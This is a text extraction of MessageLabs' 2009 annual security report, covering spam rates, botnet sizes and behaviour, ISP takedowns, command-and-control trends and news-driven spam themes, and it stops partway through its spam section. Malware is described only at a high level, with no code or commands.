MessageLabs Intelligence:

2009 Annual Security Report

Image generated by source code from Cutwail Botnet

 >NETSKY
>EMAIL WORM

Discovered on 21 March 2004, this worm is

still a present threat in email traffic today.

>PHISHING1
>SUBJECT: CONFIRM YOUR
>ONLINE ACCOUNT DETAILS

Phishing continues to be a serious problem with many computer users

finding it difficult to distinguish phishes from legitimate emails. There are
several common “angles” of phishing attacks. Some, like this example,
require the recipient to confirm their details, often under the guise of
enhancing security.

>SEXDATING1
>SUBJECT: PAISSIRA
>TEXT/HTML SPAM

Starting in late 2007, this spam run

promoted “adult dating” or
“extreme dating” websites. The
content of the spam, and the
website that it links to, are usually
very explicit and could cause
considerable offence.

>CUTWAIL
>INSTALLER TROJAN

CUTWAIL also known as PUSHDO and PANDEX, is currently one of the

world’s largest botnets controlling more than one million active bots.

>CIMUZ
>INFORMATION-STEALING TROJAN

CIMUZ is an information-stealing Trojan that hooks itself

into Internet Explorer. By capturing information entered
or saved by the user, including passwords, keystrokes
and other confidential information, it transmits the
harvested data to its controller. This terminates security
software and unlocks firewalls, leaving the computer
vulnerable to further attacks.

>STORM
>MALWARE
>AKA: STORMWORM, NUWAR AND ZHELATIN

STORM is one of the names for the aggressively spreading malware also known as
STORMWORM, DORF, PEACOMM, NUWAR and ZHELATIN. It enabled the formation of one
of the largest botnets in history, once estimated at two million compromised computers
around the world.
 >TT.PDF
>TARGETED TROJAN

TT.PDF is a PDF attached to an email which doesn’t contain any

real content. If opened a message is displayed stating that the
document is damaged and is being repaired. The document
viewer may then crash as malicious code is written to disk and
then executed. The first thing it then does is to display another
PDF with the expected content in order to cover its tracks.

>DEGREESDIPLOMA5
>SUBJECT: INTERESTED TO OBTAIN
BACHELORS’ DEGREES
>TEXT SPAM

This type of spam run is quite common, promoting

degrees from “degree farms” or “prestigious
non-accredited universities”. The spam often
includes phone numbers instead of URLs. These
phone numbers are usually just voicemail boxes,
where a long greeting explains the offer, and
interested people are then invited to leave their
details.

>GHOST
>KEYLOGGER
Keyloggers are a particularly
dangerous type of security threat.
They save all keystrokes on that
computer to a file for later use.
Ghost is even more advanced as it
also saves screenshots and
addresses of websites visited. This
extra information can be used to
easily identify sites that passwords
belong to and then carry out
fraudulent activity using the
accounts.
>TODYNHO
>INFORMATION-STEALING TROJAN

TODYNHO is an information-stealing Trojan originating from Brazil

that steals a victim’s bank account details. The name TODYNHO was
taken from the name of the email attachment.

>HUIGEZI
>TARGETED TROJAN
HUIGEZI is a targeted Trojan dropped via a PDF exploit. It spies on audio and
video communications, in addition to web, email, IM and others. It is most
commonly used for industrial espionage.

>PHISHING9
>SUBJECT: FOR YOUR SECUIRTY WE
>DEACTIVATED YOUR CARD ACCOUNT

Some phishes take the approach of claiming that the recipient’s bank account or credit card has
been suspended, ostensibly due to fraudulent activity. To unlock or reactivate the account, the
unsuspecting user is duped into entering their details giving them directly to the phisher.
MESSAGELABS INTELLIGENCE

CONTENTS
1. Executive Summary and Overview 5
2. At A Glance: 2009 in Review 6
3. Spam: Top Threats of 2009 7
3.1. Spam Summary 7
3.2. Brazen Botnets: Lessons Learned From McColo and the Botnet Evolution  7
3.3. How Events in 2009 and Celebrity News Shaped the Spam Landscape 13
3.4. Spam and the Importance of CAPTCHAs 16
3.5. Spam Tactics Including Free Services, Image Spam and Shortened URLs 17
3.6. The Language of Spam  23
3.7. Spam predictions for 2010 29

4. Malware: Top Threats of 2009 30

4.1. Malware Summary 30
4.2. Themed Malware Attacks: Email Bourne on the Fourth of July 30
4.3. Targeted and Semi-Targeted Attacks 31
4.4. The Rise of Generic Droppers: Downadup/Conficker  34
4.5. Bredolab Trojans Delivered by Cutwail Botnet  35
4.6. The Rise of Malicious Websites, New Malware & Toolkits 37
4.7. Instant Messaging Threats  47
4.8. Malware Predictions for 2010  49

5. Fraud, Scams and Phishing: Top Threats of 2009 51

5.1. Phishing Summary 51
5.2. New Techniques, Tactics, Changes etc  51
5.3. Phishing Predictions for 2010 54
5.4. Advanced-Fee Fraud and the 2010 Soccer World Cup 54
5.5. Policy-Based Controls and the Enemy Within 54

6. Global and Business: Top Threats of 2009 57

6.1. Exposure to Cyber Threats – Likelihood of Joining a Botnet 57

7. Conclusions 59

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

1. EXECUTIVE SUMMARY AND OVERVIEW

Welcome to this 2009 annual security report in which we review the threat landscape over
the last year. 2009 was a tough year for businesses around the globe with no respite from
cyber criminals who generated an influx and variation of spam and malware that many
traditional security technologies were ill-equipped to handle.
In this report we take a closer look at the major factors and key developments over the
course of the year and their impact on the security landscape, looking ahead to 2010 to
provide insight into key threats and areas of concern. The key points to note from this report
include the following:
• The MessageLabs Intelligence report for 2009 highlights turbulent spam activity
throughout the year, with average spam levels reaching 87.7%, but with highs and lows of
90.4% in May and 73.3% in February respectively. With compromised computers issuing
83.4% of the 107 billion spam messages distributed globally per day on average, the
shutdown of botnet hosting ISPs, such as McColo in late 2008 and Real Host in August
2009 appeared to make botnets re-evaluate and enhance their command and control
backup strategy to enable recovery to take hours, rather than weeks or months. It is
predicted that in 2010 botnets will become more autonomous and intelligent, with each
node containing an inbuilt self-sufficient coding in order to coordinate and extend its own
survival.
• Botnets continued to rule the cyber security landscape in 2009 with the ten major
heavyweight spam-sending botnets, including Cutwail, Rustock and Mega-D, now
controlling at least five million compromised computers. Cutwail was a dominating force
across both spam and malware in 2009, responsible for issuing 29% of all spam or 8,500
billion spam messages between April and November 2009. Cutwail also used its strength
to spam out emails containing the Bredolab Trojan dropper, disguised in the form of a .ZIP
file attachment.
• One of the major threats of 2009, the Bredolab Trojan, was designed to give the sender
complete control of the target computer which then could be used to deploy other botnet
malware, adware or spyware onto the victims’ computer. The percentage of spam distrib-
uting the Bredolab Trojan dropper increased steadily in late 2009 and reached its highest
levels in October 2009 when it was estimated that approximately 3.6 billion Bredolab
malware emails were in circulation.
• In 2009, 90.6% of spam contained a URL, or hyperlink, driven predominately by an up-
surge in the second half of the year of using shortened URLs in spam runs, which helped
disguise the true website that the user would be visiting and making it harder for tradi-
tional anti-spam filters to identify the messages as spam. URL-shortening was frequently
used on social networking and micro-blogging sites and is popular among online criminals
because of the inherent trust relationships that exist between users of these sites.
• Other than the global credit crisis, world events, festivities and news stories also contrib-
uted to many spam themes in 2009 including St. Valentine’s Day, the H1N1 flu pandemic
and the deaths of celebrities including singer Michael Jackson and actor Patrick Swayze.
Malware writers and even 419-type advance fee fraud campaigners also got in on the
act. For example after the death of Michael Jackson, we saw Brazilian banking Trojans
distributed via malicious hyperlinks, appearing in the days following his death.
• Finally, CAPTCHAs (Completely Automated Public Turing test to tell Computer and
Humans Apart), came under increased scrutiny this year as CAPTCHA-breaking tools have
been readily traded in the underground economy, allowing cyber criminals to create large
numbers of real accounts for webmail, instant messaging and social networking websites.
There has been an emergence of businesses that specialize in providing real people to
create real accounts on major webmail services on a 24-hour basis. Often advertized
as a data processing job, each worker can be expected to receive approximately two to
three U.S. dollars per 1,000 accounts created; accounts are then sold on to spammers
for around $30 to $40. Some major sites are already investigating alternatives to the
swirling letters and numbers, such as large libraries of photographic images, in which the
user must be able to analyze or interact with the image in such a way that would be very
challenging for a computer program.

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

2. ATA A
2. AT GLANCE:
GLANCE: 20092009 IN REVIEW
IN REVIEW

Threat landscape: detected by MessageLabs Services

Total malware variants Spam botnet machines

73 million 5 million
Spam stopped Unique domains hosting malware

60 billion 30 thousand
Threat rates
2009 Email spam intercepted
Global spam rate Top 5 geographies Top 5 verticals By horizontal

87.7% 88.2% Denmark 87.7% Engineering 84.0% 1-250

84.0% 251-500
87.6% Hong Kong 86.3% Education
Global spam estimate 87.4% France 86.3% Marketing/Media
84.9% 501-1000

107
84.0% 1001-1500
86.9% China 86.0% Retail 85.5% 1501-2.5K

billion per day 86.2% Norway 85.8% Manufacturing 84.2% 2.5K+

2009 Email virus intercepted

Global virus rate Top 5 geographies Top 5 verticals By horizontal

286.4 1 in 112.2 Luxembourg 1 in 119.2 Education 1 in 217.8 1-250

1 in 1 in 173.3 China 1 in 147.8 Gov/Public Sector
1 in 227.7 251-500
1 in 218.4 501-1000
1 in 188.3 Brazil 1 in 166.8 Accom/Catering
1 in 254.1 1001-1500
1 in 199.2 United Kingdom 1 in 214.2 Marketing/Media 1 in 181.9 1501-2.5K
1 in 225.8 Germany 1 in 242.1 Engineering 1 in 244.5 2.5K+

2009 Web malware and business risks

New sites with malware Websites blocked hosting malicious content and spyware (per day)

2,465
4,000
New sites with 3,500
web viruses
/day 3,000
2,500
2,000
1,500
Nov
1,000
New sites with spyware 500

Jan Feb Mar Apr May Jun Jul Aug Sep Oct

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

3. SPAM: TOP THREATS OF 2009

3.1. Spam Summary
In 2009, the annual average spam rate was 87.7%, an increase of 6.5% on the 2008 annual
average of 81.2%. April saw a spike in image spam, accounting for 56.4% of all spam on 5
April, compared with the annual average of 28.2%.
The global spam trend for 2009 shows a sharp increase in the early half of the year following
the sharp drop in spam volumes experienced toward the end of 2008, following the closure
of McColo.

2009 Spam Rate 88.2% Denmark 87.7% Engineering 84.0% 1-250

84.0% 251-500
87.6% Hong Kong 86.3% Education

87.7% 87.4% France

86.9% China
86.3% Marketing/Media

86.0% Retail
84.9%
84.0% 1001-1500
501-1000

85.5% 1501-2500
Min February: 73.3% 86.2% Norway 85.8% Manufacturing 84.2% 2501+

Max May & June: 90.4% Top 5 Geographies Top 5 Verticals By Horizontal

84.1%
86.2% 87.7%

85.3% 81.2%

2005 2006 2007 2008 2009

Annual 2009 (Jan - Nov)

3.2. Brazen Botnets: Lessons Learned From McColo and the Botnet Evolu-
tion
By the end of 2009, 83.4% of spam originated from botnets, or “robot networks,” as
opposed to approximately 90% of spam that was sent from botnets in 2008. Botnets are
groups of semi-autonomous compromised computers that are all under the control of
cyber criminal organizations. Each botnet varies in size and may contain thousands, tens of
thousands, or even millions of computers that will receive instructions from command and
control channels. Botnets can be very flexible and are often used for a variety of criminal
activities, including distributed denial-of-service (DDoS) attacks, hosting websites and
sending spam emails.
Much of the remainder of spam not sent from botnets originated from compromised mail
servers and webmail accounts created using CAPTCHA-breaking tools.
The sharp drop in spam at the end of 2008 was a result of the widely reported demise of
California-based ISP, McColo in November 2008, after criminal botnet activity was reported
on its networks. In figure 1, it can be seen that after the demise of McColo, it took several
weeks for spam levels to rise again and months, before botnet controllers were able to
return to the same spam volumes as before the ISP was disconnected.
McColo disconnected

Return to the prior levels

Average prior to McColo
disconnect (100%)

80% drop

20%
24 Jan

31 Jan
3 Jan

10 Jan

17 Jan
13 Dec

20 Dec

27 Dec
22 Nov

29 Nov

6 Dec
1 Nov

8 Nov

15 Nov
25 Oct

Figure 1: Impact of McColo disconnection

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

As a result of McColo’s shutdown, one major botnet, Srizbi, completely faded away. Srizbi
until November 2008 had been responsible for as much as 50% of all botnet-related spam.
This left a huge gap in the spam-sending botnet market, which was soon filled by other rival
botnets, including Mega-D (aka Ozdok), Cutwail (aka Pandex) and Rustock. Rustock already
had a large number of bots under its control, but its spam-sending activities had been more
irregular than some other botnets. New botnets came onto the scene in 2009, perhaps to
capitalize on the shift in supply and demand; spammers still wanted to send spam, but the
major botnet resources were simply not available.
By May 2009, spam levels were already exceeding the peaks experienced in 2008. The
dominant botnets at this time had evolved and were by now much more technically sophisti-
cated, harder to detect and less susceptible to disruption.
3.2.1. Harnessing The Power of Botnets
With approximately 89.5 billion unsolicited messages each day being distributed by
compromised computers, understanding who is responsible is always of interest as, much
like the threat landscape, the botnet landscape is ever changing.
Figure 2 highlights the current botnet landscape, outlining which botnets are responsible for
the most spam, or have the largest number of compromised computers under their power.
It is also worth noting that there are two newcomers to this table in 2009, notably Maazben
and Festi.
% of new spam/ spam / estimated
botnet spam new spam/day min bot/min botnet size Country of Infection
Rustock 19% 20,191,511,739 14,021,883 91 540k to 810k Brazil (21%), USA (9%), Poland (7%)
Cutwail 17% 18,417,396,993 12,789,859 59 1100k to 1600k Vietnam (17%), RepKorea(12%), Brazil (10%)
Bagle 16% 17,334,321,383 12,037,723 37 520k to 780k Brazil (12%), Spain (9%), USA (9%)
Bobax 14% 14,589,066,047 10,131,296 49 100k to 160k Spain (12%), Italy (7%), India (7%)
Grum 9% 9,687,625,087 6,727,517 307 580k to 860k Vietnam (18%), Russia (17%), Ukraine (8%)
Maazben 2% 2,161,829,037 1,501,270 93 240k to 360k Romania (17%), Brazil (11%), Saudi Arabia (7%)
Festi 1% 1,353,086,645 939,644 53 140k to 220k Vietnam (31%), India (11%), China (5%)
Mega-D 1% 996,079,588 691,722 46 50k to 70k Vietnam (14%), Brazil (11%), India (6%)
Xarvester 1% 885,682,360 615,057 155 20k to 36k Brazil (15%), Poland (11%), USA (10%)
Gheg 0% 436,044,470 302,809 22 50k to 70k Brazil (15%), Poland (8%), Vietnam (8%)
Unclassified Botnets 3% 2,994,054,378 2,079,204 65 120k to 180k
Other, smaller botnets 0% 439,986,486 305,546 47 130k to 190k
Total BotnetSpam 83% 89,486,684,212 62,143,531 85 3600k to 5400k Brazil (13%), Vietnam (7%), USA (6%)
Non-botnet spam 17% 17,827,092,771 12,379,926
Grand Total 100% 107,313,776,983 74,523,456

Figure 2: Top botnets at the end of 2009

General
• The botnet responsible for sending the highest percentage of spam was Mega-D.
Shortly after the demise of McColo, Mega-D spam output peaked at 58.3% of
global spam on 1 January 2009. Next highest was Cutwail, which was linked to
46.5% of all spam on 14 May 2009. Third highest was Rustock, which generated
28.6% of global spam on 21 October 2009.
• During 2009, Bagle managed to quadruple the number of bots under its control as
well as its output, as it climbed into the top-3 most heavyweight botnets, based on
percentage of spam, by the end of the year.
Rustock
• Rustock climbed into the top spot at the end of 2009, but had been consistently
among the top 5 botnets based on the percentage of spam distributed throughout
2009. Rustock had frequently taken the approach to send spam at full capacity for
short periods, followed by longer periods of silence, often for days at a time.
• Between August and September 2009, Rustock had between 1.3 million to 2 million
active bots under its control.
• Rustock’s peak spam-sending period for 2009 was between October and November
2009. At that time, Rustock was sending almost three times as much spam per
minute than it had sent in January.
• Rustock had accounted for approximately 10-20% of all spam for much of the year,

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

but by the end of 2009 it had increased its dominance and stabilized its output to
approximately 18% of all spam.
• By the end of 2009, Rustock was mostly sending pharmaceutical and medical
spam.
Cutwail
• Cutwail was always listed in the top-3 spam-sending botnets throughout 2009, and
was comparable in size to Rustock. Both Cutwail and Rustock were unrivalled in
terms of their size.
• Cutwail had retained between 1 million to 1.5 million bots throughout the year.
Botnets frequently experience a turnover of bots over time, and in order to
maintain this level of control, Cutwail had been aggressive in its recruitment.
• Cutwail was linked to the surge in Bredolab malware, and frequently linked to
spoofed greetings card emails containing malicious hyperlinks.
• In 2009, Cutwail was frequently linked to phishing activities, and pharmaceutical
spam and spam touting counterfeit watches.
• Cutwail had its peak of spamming activity between April and June 2009, when it
had sent more than double the volume of spam of rival botnets and was linked
to 46.5% of all spam. By the end of the year, Cutwail had the 2nd largest output
behind Rustock, linked with approximately 17% of all spam.
Bagle
• Bagle has grown from between 100,000 and 200,000 bots in January 2009 to
between 600,000 and 800,000 bots by the end of the year. This represents a four-
fold growth in the number of bots under its control, consistent with its four-fold
increase in spam output over the same period.
• By the end of 2009, Bagle was responsible for approximately 16% of global spam,
just behind Cutwail and Rustock.
• Bagle was almost exclusively sending pharmaceutical or medical spam by the end
of 2009.
Bobax (aka Kraken)
• Bobax, like Bagle, has increased its output over 2009, barely registering in the top
10 botnets in January, and rising to 4th place by the end of the year. The number
of bots involved in sending spam did not increase significantly, with an estimated
80,000 to 120,000 bots, Bobax had increased the rate at which each bot was
sending spam.
• Compared with its output in January, Bobax was sending approximately 10-times
more spam by the end of the year and accounted for approximately 13% of spam,
behind Rustock, Cutwail and Bagle.
• By the end of 2009, Bobax had returned to its pre-McColo spam levels, taking
over a year to recover from the disruption. It was mostly sending spam relating to
counterfeit fashion accessories and watches.
Grum
• Grum had steadily increased its output during 2009, with its busiest period be-
tween June and September, when it was sending more spam than any other botnet
during September, and responsible for approximately 20% of all spam.
• Grum had an estimated 600,000-800,000 bots under its control by the end of
2009, responsible for sending approximately 9% of all spam, predominantly
pharmaceutical in nature.
Maazben
• This new botnet appeared around March 2009 and has not really asserted itself
despite a surge of spam during September and October when it was responsible for
as much as 3% of all spam.
• With approximately 200,000-300,000 bots under its control, Maazben was
responsible for approximately 2% of all spam by the end of 2009, sending mostly
French and German language casino related and gambling spam.
Festi
• Another new botnet that emerged as part of the botnet landscape in August 2009
and underwent a large increase in output during late October 2009 and early

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

November 2009, but has since returned to approximately 1% of spam.

• By the end of 2009, Festi comprised of an estimated 100,000-200,000 bots, mostly
responsible for counterfeit watch spam and fake fashion accessories.
Mega-D
• At the start of 2009, Mega-D was the main spamming botnet and emerged after
the McColo closure as the most active botnet, comprising of an estimated 300,000-
500,000 bots. However, as the year progressed, Mega-D seemed to be seriously
hemorrhaging bots, its estimated size plummeted to less than 100,000 bots. As
a retort, Mega-D seemed to be commanding its bots to send more and more spam
from each, in order to sustain its overall level of output.
• In terms of spam output, Mega-D showed a gradual decline throughout 2009 as it
lost more and more bots, from a high in January when 58.3% of spam originated
from Mega-D.
• Almost eradicated on 4 November 2009 as the result of community action to
disrupt the botnet, spam from Mega-D fell to approximately 1% of all spam. Mega-
D returned on 13 November using a different collection of bots, sending between
4-5% of spam.
• By the end of 2009, Mega-D was sending mostly pharmaceutical spam and some
phishing activity.
Xarvester
• At the start of 2009, Xarvester was heralded as the heir to the already defunct
Srizbi botnet, as it launched the year with an onslaught of spam. Xarvester was
widely believed to be designed and operated by the owners of the ill-fated Srizbi
botnet, and the security community paid it close attention, resulting in a lot of
activity to suppress Xarvester’s operation. By March, Xarvester’s output had faded,
and throughout the rest of 2009, it never recovered.
• Although Xarvester had been responsible for sending a lot of spam in 2009, it
did not become the giant that everyone expected after it first appeared in Janu-
ary, when it had an estimated 500,000-800,000 bots under its control and was
responsible for more than 32.1% of all spam on 3 January.
• By the end of 2009, Xarvester had an estimated 20,000-36,000 bots, and was
responsible for less than 1% percent of all spam; sending mostly pharmaceutical
and medical spam.
Gheg
• Like Xarvester, Gheg was very strong in January, sending approximately 5% of all
spam. With an estimated 150,000-200,000 bots following the closure of McColo,
its output generally faded during the rest of the year, falling to less than 100,000
bots by the end of the year and linked to approximately 0.5% of all spam, mostly
Russian language dating spam, and medical spam in French, German and English.
Donbot
• Although not featured in the list of top spam-sending botnets at the end of 2009,
Donbot had been an important feature of the botnet landscape in 2009. Donbot
appeared in the wake of the McColo closure and underwent an almost exponential
rise in output during the first quarter of 2009. Donbot was the number one botnet
at the start of the year, but gradually faded. However, it returned to large scale
spamming in July and August, and latterly in November when it was associated
with spam containing links to profiles on social networking and micro-blogging
websites.
• At its peak of activity during the first quarter of 2009, Donbot comprised an
estimated 800,000 to 1.2 million bots, falling to an estimated 100,000-150,000 by
the end of the year.
• By the end of the first quarter 2009, Donbot was responsible for approximately
17% of all spam falling to less than 0.5% towards the end of the year. During
November, Donbot was able to generate between 5-10% of spam, containing
hyperlinks related to social networking and micro-blogging accounts, related to
“make-money-working-at-home” type spam messages.

Figure 3: Descriptions of top botnets in 2009

10

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

100%

DONBOT FESTI
90%

XARVESTER MAAZBEN
80%

GHEG
70%

RUSTOCK
60%

50%

40%
GRUM
SRIZBI
30% MEGA-D

20%

CUTWAIL
10%
BOBAX
BAGLE
0%
Dec 2008
Sep 2008

Oct 2008

Aug 2009

Oct 2009
Apr 2009
Nov 2008

Jan 2009

Feb 2009

May -2009

Sep 2009

Nov 2009
Jun 2009
Mar 2009

Jul 2009
Figure 4: Contribution of Top 10 botnets to spam in 2009
3.2.2. Cutwail: Botnet Business as Usual
The Cutwail botnet is among the eldest of botnets. Malware linked to the Cutwail botnet was
first identified in January 2007. With between one and two million compromised computers
under its control, Cutwail was perhaps the largest botnet in history at its peak. Cutwail has
been very active in spamming-out emails containing the Bredolab Trojan dropper, which
in turn has been used to deploy other botnet malware, adware and spyware onto victims’
computers. Bredolab is discussed in more detail in the malware section of this report.
Cutwail experienced several hours of downtime on the morning of 5 June 2009, following
another ISP shutdown earlier that week by the U.S. Federal Trade Commission. California-
based ISP Pricewert LLC (also known as 3FN and APS Telecom) allegedly engaged in the
deployment of botnets and the distribution of illegal, malicious and harmful content such as
spam and exploitative images of children. However, this time the Cutwail botnet was able to
recover after only a few hours highlighting the progress that spammers had made since Mc-
Colo’s shutdown just seven months earlier. Clearly, spammers were learning the importance
of having a proper backup strategy for their command and control channels.
Spammers demonstrated this again when Real Host, an ISP based in Riga, Latvia and al-
leged to be linked to command-and-control servers for infected botnet computers, as well as
responsible for malicious websites, phishing websites and “rogue” anti-virus products, was
disconnected by its upstream providers on 1 August 2009. The impact was felt immediately,
as spam volumes dropped briefly by as much as 38% in the subsequent 48-hour period.
Much of this spam was linked to the Cutwail botnet which, at the time was responsible for
approximately 15-20% of all spam. Cutwail’s activity levels fell by as much as 90% when
Real Host was taken offline, but quickly recovered in a matter of days.
3.2.3. Regular Rustock: The Botnet with a Heartbeat
Analysis of the Rustock botnet in the latter part of 2009 revealed some interesting insights
regarding how it settled into a remarkably predictable pattern of spamming. Every day at
0800 GMT (1500 EST) it distributed spam emails, continuing throughout the day, peaking at
about 1200 GMT (0700 EST), and then ceasing spamming at 2400 GMT (1900 EST). It then
rested for about eight hours, before the cycle began again the following day.
As Rustock was one of the most dominant botnets during 2009, responsible for as much
as 19.3% of all spam by the end of the year, the same regular pattern could be observed in
total daily spam patterns for all spam.

11

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

3.6bn

3bn

2.4bn

1.8bn

1.2bn

600m

Mon 07 Tue 08 Wed 09 Thu 10 Fri 11 Sat 12 Sun 13

Figure 5: Rustock – lifecycle of activity

This regular pattern of spamming for Rustock began in July 2009. Prior to that, Rustock
was spamming in much bigger bursts, but less frequently, roughly two weeks on followed by
two weeks off. Following this trend later in the year, the Bobax botnet began spamming in
regular 10 minute intervals, with very high volume bursts, approximately once every hour.
This pattern began on Friday 13 November.

3.2.4. Command and Control: Mysterious Messages and Covert Channels

In the 12-months since the McColo ISP was taken offline the Trojan technology behind
botnet-oriented malware has improved, with more rootkit-type kernel drivers becoming the
norm. A rootkit is a set of software tools or services that enable an attacker to hide the fact
that a computer has been compromised.
The command and control (C&C) mechanisms have also evolved, making it harder to disrupt
a botnet, shifting more towards HTTP and away from IRC (Internet Relay Chat) . With
increased use of “bullet-proof” or fast-flux based domain name services, more command
and control channels will be reliant on HTTP as the protocol of choice.
‘Bullet-proof’ services often rely on domain registrars that are resistant to notice and
takedown requests and as such, these services are likely to be available much longer than
those hosted by mainstream providers. So called bullet-proof services may also make use of
fast-flux, which is a DNS technique used to conceal the addresses of websites used to host
malware, spam and phishing content. The websites are hidden behind a continually chang-
ing list of IP addresses of compromised computers acting as web servers or web proxies and
used to make botnets more difficult to disrupt. The now defunct Storm botnet was one of
the earliest botnets to use this technique.
As predicted, Web 2.0 provided a good environment for contextual malware that was able
to consolidate multiple data streams from diverse unrelated sources, creating a malicious
environment. Examples of this included the application of public services such as social
networks and micro-blogging sites being used to host the command and control channels of
some botnet activities. In 2009 some examples of social networking1 and micro-blogging2
environments being used to transmit botnet command and control instructions came to
light.
More examples are likely to manifest during 2010, as malicious instructions are likely to
be fragmented and concealed within ostensibly innocuous files, such as images and audio
content hosted on websites. These files will then be accessed remotely over HTTP and
reassembled on-the-fly to reconstruct the malicious code or instructions.
As more and more botnets made use of peer-to-peer (P2P) command and control during
2009, this helped to reduce the impact of having single points-of-failure, such as a single
rogue ISP.
P2P botnets use a mechanism where each member of the botnet has learned of the location
and identity of a number of other members of the same botnet, and information is shared
between them. Command and control instructions could then be issued to one botnet
1 http://www.symantec.com/connect/blogs/trojanwhitewell-what-s-your-bot-facebook-status-today
2 http://www.symantec.com/connect/blogs/twittering-botnets

12

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

member, which in turn are cascaded to the other members that it knows of. As instructions
are received, they are shared with other members along the chain, eventually reaching the
entire botnet. P2P communications are often encrypted or disguised as other legitimate
traffic, such as DNS or HTTP requests.
As we move into 2010, it is expected that botnets will become more autonomous or artifi-
cially intelligent, perhaps even exhibiting the characteristics of swarm intelligence, where
each compromised computer will have built-in self-sufficient coding in order to coordinate
and extend its own survival. This will mean the botnet controllers will have more time to
focus on driving the bots use in spamming and other criminal activities, rather than dedicate
resources to extending the lifecycle of the botnet.
3.2.5. Mega-D and the Zombie Renaissance: Botnets Become Harder to Disrupt
On 4 November, a team of researchers from FireEye3 initiated a series to activities in order
to disrupt and wrestle for control of the Mega-D (Ozdok) botnet. By virtue of a coordinated
effort with several ISPs, the effort was initially hugely successful and the Mega-D botnet
was crippled overnight. This remained the case for a further nine days, but with a twist of
irony, on Friday 13 November, Mega-D effectively rose from the dead and large volumes of
spam were pumped-out again. Further investigation of the traffic showed that 95% of the IP
addresses being used after the resurgence had never before been connected with Mega-D.
This is rather revealing as it suggests that the botnet controllers responsible for Mega-D had
a backup strategy, perhaps a collection of “sleeper” bots that were previously inactive and
had now been activated – possibly another lesson the spammers learned from the McColo
takedown.

3.3. How Events in 2009 and Celebrity News Shaped the Spam Landscape
The global credit crisis and the election of U.S. President Barack Obama provided two major
themes to much of the spam blocked in early 2009. Other events, festivities and news
stories also contributed to many spam themes in 2009, including St. Valentine’s Day on
14 February, St. Patrick’s Day and NCAA March Madness in the U.S. in March; the 4 July
Independence Day in the U.S., the global flu pandemic of H1N1, the fatal crash of Air France
flight 447 as well as the deaths of singer Michael Jackson and actor Patrick Swayze.

Figure 6: Example of H1N1 spam

Following the death of Michael Jackson on 25 June, the topic was quickly adopted in several
spam campaigns and at the time, approximately 1% of all spam referenced Michael Jackson.

3 http://blog.fireeye.com/research/2009/11/smashing-the-ozdok.html

13

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

Figure 7: Typical spam email following the death of Michael Jackson

Malware and even 419-type advance fee fraud campaigns exploiting the Michael Jackson
topic were not far behind, with the first examples appearing in the days following his death,
including a Brazilian banking Trojan which was distributed in malicious hyperlinks contained
in spam emails. A banking Trojan is able to intercept and capture an individual’s credentials
and these examples were targeting specifically Brazilian banks.

Figure 8: Malware website with content relating to the death of Michael Jackson
Even before Jackson’s death, news of Farrah Fawcett’s passing precipitated a spate of spam
purporting to relate to her death and later when the death of Patrick Swayze was announced
on 15 September it was only a matter of time before the spammers and cyber criminals used
the opportunity to tailor their output accordingly.

3.3.1. Global Economic Recession Emerged as a Key Spam Theme in 2009

The financial gloom has served as a popular topic for spammers and fraudsters, especially
during the first half of 2009. As credit became harder to secure through traditional means
and the global economic woes provided consumers with uncertainty, spammers, fraudsters
and phishers added the recession to their list of themes to leverage.
In February, spam containing hyperlinks to a number of major well-known search engines
delivered much of the early recession-based spam. The hyperlinks were not using auto-
mated redirection links as had been seen previously, but using an automated search for the
spammers’ website domains. Search engine spamming techniques enable the spammers

14

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

to include a hyperlink constructed from a search engine query within the body of the email.
When the link is followed it leads the browser to the spammers’ websites.

Figure 9: Examples of typical spam emails linked to global recession in 2009

The use of search engines in this way allows spammers to include hyperlinks to their
websites without using a hyperlink to the actual spam domain. This makes it harder for tra-
ditional anti-spam techniques that rely on the knowledge and reputation of domains used
in hyperlinks to make a judgment as to the likelihood of the message being spam or not.
This was just one early example of the importance that reputable domains would play in
the spammers’ arsenal. It becomes impossible for anti-spam technology to rely on this
information to block spam messages, without impacting legitimate users of those domains
and services. This particular technique relied on the user clicking on the link displayed in
the search results – it was not automatically redirected and the instructions for this were
included in the email itself.
During the early part of 2009, MessageLabs Intelligence also became aware of an increase in
genuine emails being sent by cash-strapped individuals who had turned to email as a means
of seeking charitable assistance, support or guidance from a number of businesses. These
messages are small in volume by comparison with the wider volume of spam and phishing
emails, but seemingly equally liable to provoke an inflamed response from many recipients
who believed they were fakes or scams.
3.3.2. From St. Valentine’s Day to Halloween, Thanksgiving and Christmas
The Cutwail botnet was identified as the main source of St. Valentine’s Day spam messages
in February. St. Valentine’s Day spam accounted for as much as 9% of all spam around 14
February, with the Cutwail botnet responsible for 6.5% of this, with almost 3% connected
with the Xarvester botnet. Approximately 1 in 15 messages sent by the Cutwail botnet were
St. Valentine’s Day themed. With subjects such as “St. Valentine’s Bonus” and “Make this
Valentine’s Day the most memorable ever,” the Cutwail botnet was sending approximately 7
billion spam emails each day; perhaps the largest ever St. Valentine’s Day spam campaign.
In 2008, St. Valentine’s spam originated from the infamous Storm (aka Peacomm) botnet
and accounted for only 2% of daily spam levels.
In the twilight months of 2009, the holiday season including Halloween and Thanksgiving
in the U.S., was an important time of year for many spammers. MessageLabs Intelligence
identified a relatively small proportion of spam messages, accounting for less than 0.5%
of all spam emails that were related to Halloween, and spam subjects included, “Biggest
deal this halloween,” “A HORRIFYING HALLOWEEN SALE!” and “Halloween discount.” The
bewitching emails were distributed from both the Rustock and Donbot botnets, in roughly
equal amounts. The majority of this type of spam linked to pharmaceutical or medical spam
websites.
With Halloween, Thanksgiving and Christmas so close together on the calendar, it appeared
one of the spam gangs using the Cutwail botnet became confused. While their goal seemed

15

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

to be to sell replica watches, the spammers used both Thanksgiving and Christmas as
themes in their messages. However, they sometimes mixed-up the subjects in the process.

